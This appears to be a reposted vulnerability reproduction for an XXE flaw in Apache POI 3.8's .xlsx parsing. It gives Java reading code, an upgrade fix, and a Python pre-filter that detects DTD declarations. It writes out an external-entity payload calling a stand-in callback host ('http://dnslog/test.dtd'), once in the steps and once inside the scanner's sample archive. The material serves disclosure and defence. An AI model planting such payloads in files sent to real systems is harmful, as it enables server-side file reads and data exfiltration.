• Reproducing the XXE vulnerability in org.apache.poi 3.8 Excel parsing


    Reproduction steps

    Add the dependencies to pom.xml:

    <dependency>
        <groupId>org.apache.poi</groupId>
        <artifactId>poi</artifactId>
        <version>3.8</version>
    </dependency>
    <dependency>
        <groupId>org.apache.poi</groupId>
        <artifactId>poi-ooxml</artifactId>
        <version>3.8</version>
    </dependency>

    Key code (the parsing happens inside the XSSFWorkbook constructor, so the caller does not need to do anything unusual to trigger the bug):

    import java.io.FileInputStream;
    import java.io.IOException;
    import org.apache.poi.xssf.usermodel.XSSFRow;
    import org.apache.poi.xssf.usermodel.XSSFSheet;
    import org.apache.poi.xssf.usermodel.XSSFWorkbook;

    public String readExcelData(String path, String sheetName) throws IOException {
        FileInputStream fileInputStream = new FileInputStream(path);
        // The workbook constructor parses the XML parts of the .xlsx package;
        // in POI 3.8 this parse resolves external entities, which is the XXE reproduced here
        XSSFWorkbook sheets = new XSSFWorkbook(fileInputStream);
        // get the sheet
        XSSFSheet sheet = sheets.getSheet(sheetName);
        // number of rows
        int rows = sheet.getPhysicalNumberOfRows();
        StringBuilder cell = new StringBuilder();
        for (int i = 0; i < rows; i++) {
            // number of columns in this row
            XSSFRow row = sheet.getRow(i);
            int columns = row.getPhysicalNumberOfCells();
            for (int j = 0; j < columns; j++) {
                cell.append(row.getCell(j).toString()).append("</br>");
            }
        }
        fileInputStream.close();
        return cell.toString();
    }


    Unzip xxe.xlsx, edit [Content_Types].xml, and insert the following as the second line (directly after the XML declaration), then re-zip the package:

    <!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://dnslog/test.dtd"> ]>
    <x>&xxe;</x>


    Once the file is read through the code above, the external entity is resolved and the DNSLog callback fires.

    Solution:

    Upgrade POI to version 4.0.1 or later.
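    As an added defender-side check, not code from the original post, the following Python scans every XML part inside an .xlsx archive for DOCTYPE or ENTITY declarations, which a legitimate OOXML package never contains, so a file can be rejected before it reaches a vulnerable POI version. The archive it inspects is constructed inline and carries the [Content_Types].xml modification described above; the function and file names are assumptions of this example.

```python
import io
import re
import zipfile

# A legitimate OOXML package never carries a DTD, so any DOCTYPE or ENTITY
# declaration inside an XML part is a strong indicator of an XXE attempt.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_RE = re.compile(rb"<!ENTITY\b", re.IGNORECASE)


def find_dtd_parts(xlsx_bytes):
    """Return the names of XML parts in an .xlsx (a ZIP) that declare a DTD or entity."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        for name in zf.namelist():
            # [Content_Types].xml, .rels relationship files and the sheet/workbook parts are all XML
            if not (name.endswith(".xml") or name.endswith(".rels")):
                continue
            data = zf.read(name)
            if DOCTYPE_RE.search(data) or ENTITY_RE.search(data):
                flagged.append(name)
    return flagged


def build_sample(malicious):
    """Constructed minimal xlsx-like archive (not a real workbook); the malicious
    variant carries the post's payload as the second line of [Content_Types].xml."""
    content_types = b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    if malicious:
        content_types += (b'<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://dnslog/test.dtd"> ]>\n'
                          b'<x>&xxe;</x>\n')
    content_types += (b'<Types xmlns="http://schemas.openxmlformats.org/package/'
                      b'2006/content-types"></Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("xl/workbook.xml", b'<?xml version="1.0"?><workbook/>')
    return buf.getvalue()


if __name__ == "__main__":
    print(find_dtd_parts(build_sample(True)))   # ['[Content_Types].xml']
    print(find_dtd_parts(build_sample(False)))  # []
```

    This is a pre-filter only; the actual fix remains upgrading POI, since the scan can be bypassed by content the regexes do not cover and does not replace a parser that refuses DTDs.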

  • Original article: https://www.cnblogs.com/fczlm/p/15946961.html